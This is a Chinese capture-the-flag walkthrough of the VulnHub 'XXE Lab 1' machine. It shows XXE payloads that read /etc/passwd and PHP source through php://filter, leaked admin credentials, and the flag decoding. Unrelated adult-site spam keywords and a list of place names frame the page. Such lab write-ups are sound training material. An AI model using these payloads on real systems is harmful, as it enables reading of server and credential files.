最美情侣中文字幕电影,在线麻豆精品传媒,在线网站高清黄,久久黄色视频

歡迎光臨散文網(wǎng) 會(huì)員登陸 & 注冊(cè)

【攻略鴨】XXE Lab 1_VulnHub靶機(jī)攻略

2023-01-06 11:06 作者:攻略鴨  | 我要投稿

本文內(nèi)容純屬虛構(gòu),B站攻略鴨求關(guān)注點(diǎn)贊支持!

靶機(jī)地址:

$ sudo arp-scan -l
192.168.221.151

http://192.168.221.151/xxe/

外部信息收集

端口掃描

80/tcp ? open ?http ? ?syn-ack ttl 64 Apache httpd 2.4.27 ((Ubuntu))
| http-robots.txt: 2 disallowed entries
|_/xxe/* /admin.php
5355/tcp open ?llmnr? ?syn-ack ttl 1

網(wǎng)站信息

看到登錄框,嘗試登錄并抓包:

POST /xxe/xxe.php HTTP/1.1
Host: 192.168.221.151
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: text/plain;charset=UTF-8
Content-Length: 95
Origin: http://192.168.221.151
Connection: close
Referer: http://192.168.221.151/xxe/

<?xml version="1.0" encoding="UTF-8"?><root><name>tester</name><password>test</password></root>

修改請(qǐng)求包測(cè)試:

POST /xxe/xxe.php HTTP/1.1

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY tester SYSTEM "file:///etc/passwd">
]>
<root><name>&tester;</name><password>test</password></root>

返回包:

root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
xxx省略部分xxx
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
syslog:x:104:108::/home/syslog:/bin/false
messagebus:x:105:109::/var/run/dbus:/bin/false
_apt:x:106:65534::/nonexistent:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
r00t:x:1000:1000:Administrator,,,:/home/r00t:/bin/bash

可見(jiàn)存在XXE漏洞。

XXE漏洞利用

直接訪問(wèn)http://192.168.221.151/admin.php返回404。

利用XXE漏洞讀取PHP文件:

<!ENTITY tester SYSTEM "php://filter/read=convert.base64-encode/resource=admin.php">

返回值Base64解碼后主要內(nèi)容為:

<?php
? ?$msg = '';
? ?if (isset($_POST['login']) && !empty($_POST['username'])
? ? ? && !empty($_POST['password'])) {
?

? ? ? if ($_POST['username'] == 'administhebest' &&
? ? ? ? ?md5($_POST['password']) == 'e6e061838856bf47e1de730719fb2609') {
? ? ? ? ?$_SESSION['valid'] = true;
? ? ? ? ?$_SESSION['timeout'] = time();
? ? ? ? ?$_SESSION['username'] = 'administhebest';
? ? ? ? ?
? ? ? ?echo "You have entered valid use name and password <br />";
$flag = "Here is the <a style='color:FF0000;' href='/flagmeout.php'>Flag</a>";
echo $flag;
? ? ? }else {
? ? ? ? ?$msg = 'Maybe Later';
? ? ? }
? ?}
?>
</div> <!-- W00t/W00t -->

整理上面信息得到:

Flag位置:/flagmeout.php
username:administhebest
password:admin@123(md5:e6e061838856bf47e1de730719fb2609)
W00t/W00t

利用XXE讀取flagmeout.php:

<!ENTITY tester SYSTEM "php://filter/read=convert.base64-encode/resource=flagmeout.php">

返回值Base64解碼后為:

<?php
$flag = "<!-- the flag in (JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5) -->";
echo $flag;
?>

注釋表明flag位置需要解碼32位的JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5 Base32解碼得到L2V0Yy8uZmxhZy5waHA= 再Base64解碼得到/etc/.flag.php

利用XXE讀取/etc/.flag.php:

<!ENTITY tester SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/.flag.php">

得到:

JF9bXSsrOyRfW109JF8uXzskX19fX189JF9bKCsrJF9fW10pXVsoKyskX19bXSkrKCsrJF9fW10pKygrKyRfX1tdKV07JF89JF9bJF9bK19dXTskX19fPSRfXz0kX1srKyRfX1tdXTskX19fXz0kXz0kX1srX107JF8rKzskXysrOyRfKys7JF89JF9fX18uKyskX19fLiRfX18uKyskXy4kX18uKyskX19fOyRfXz0kXzskXz0kX19fX187JF8rKzskXysrOyRfKys7JF8rKzskXysrOyRfKys7JF8rKzskXysrOyRfKys7JF8rKzskX19fPStfOyRfX18uPSRfXzskX19fPSsrJF9eJF9fX1srX107JMOAPStfOyTDgT0kw4I9JMODPSTDhD0kw4Y9JMOIPSTDiT0kw4o9JMOLPSsrJMOBW107JMOCKys7JMODKys7JMODKys7JMOEKys7JMOEKys7JMOEKys7JMOGKys7JMOGKys7JMOGKys7JMOGKys7JMOIKys7JMOIKys7JMOIKys7JMOIKys7JMOIKys7JMOJKys7JMOJKys7JMOJKys7JMOJKys7JMOJKys7JMOJKys7JMOKKys7JMOKKys7JMOKKys7JMOKKys7JMOKKys7JMOKKys7JMOKKys7JMOLKys7JMOLKys7JMOLKys7JMOLKys7JMOLKys7JMOLKys7JMOLKys7JF9fKCckXz0iJy4kX19fLiTDgS4kw4IuJMODLiRfX18uJMOBLiTDgC4kw4EuJF9fXy4kw4EuJMOALiTDiC4kX19fLiTDgS4kw4AuJMODLiRfX18uJMOBLiTDgi4kw4MuJF9fXy4kw4EuJMOCLiTDgC4kX19fLiTDgS4kw4kuJMODLiRfX18uJMOBLiTDiS4kw4AuJF9fXy4kw4EuJMOJLiTDgC4kX19fLiTDgS4kw4QuJMOGLiRfX18uJMOBLiTDgy4kw4kuJF9fXy4kw4EuJMOGLiTDgS4kX19fLiTDgS4kw4guJMODLiRfX18uJMOBLiTDgy4kw4kuJF9fXy4kw4EuJMOILiTDgy4kX19fLiTDgS4kw4YuJMOJLiRfX18uJMOBLiTDgy4kw4kuJF9fXy4kw4EuJMOELiTDhi4kX19fLiTDgS4kw4QuJMOBLiRfX18uJMOBLiTDiC4kw4MuJF9fXy4kw4EuJMOJLiTDgS4kX19fLiTDgS4kw4kuJMOGLiciJyk7JF9fKCRfKTsK

Base64解碼得到:

$_[]++;$_[]=$_._;$_____=$_[(++$__[])][(++$__[])+(++$__[])+(++$__[])];$_=$_[$_[+_]];$___=$__=$_[++$__[]];$____=$_=$_[+_];$_++;$_++;$_++;$_=$____.++$___.$___.++$_.$__.++$___;$__=$_;$_=$_____;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$___=+_;$___.=$__;$___=++$_^$___[+_];$à=+_;$á=$?=$?=$?=$?=$è=$é=$ê=$?=++$á[];$?++;$?++;$?++;$?++;$?++;$?++;$?++;$?++;$?++;$?++;$è++;$è++;$è++;$è++;$è++;$é++;$é++;$é++;$é++;$é++;$é++;$ê++;$ê++;$ê++;$ê++;$ê++;$ê++;$ê++;$?++;$?++;$?++;$?++;$?++;$?++;$?++;$__('$_="'.$___.$á.$?.$?.$___.$á.$à.$á.$___.$á.$à.$è.$___.$á.$à.$?.$___.$á.$?.$?.$___.$á.$?.$à.$___.$á.$é.$?.$___.$á.$é.$à.$___.$á.$é.$à.$___.$á.$?.$?.$___.$á.$?.$é.$___.$á.$?.$á.$___.$á.$è.$?.$___.$á.$?.$é.$___.$á.$è.$?.$___.$á.$?.$é.$___.$á.$?.$é.$___.$á.$?.$?.$___.$á.$?.$á.$___.$á.$è.$?.$___.$á.$é.$á.$___.$á.$é.$?.'"');$__($_);

再腳本首部添加<?php,運(yùn)行PHP腳本得到flag:SAFCSP{xxe_is_so_easy}

標(biāo)簽:

【攻略鴨】XXE Lab 1_VulnHub靶機(jī)攻略的評(píng)論 (共 條)

分享到微博請(qǐng)遵守國(guó)家法律
哈尔滨市| 玉屏| 三原县| 拉孜县| 崇文区| 即墨市| 布拖县| 青海省| 武功县| 汪清县| 徐州市| 抚州市| 临清市| 南充市| 玉溪市| 翁源县| 荣昌县| 什邡市| 灵山县| 监利县| 四平市| 营口市| 峨边| 怀柔区| 育儿| 宜宾县| 洛隆县| 汕尾市| 惠安县| 冀州市| 永寿县| 祥云县| 巨野县| 武邑县| 镇康县| 江永县| 岳西县| 西城区| 富宁县| 松阳县| 崇信县|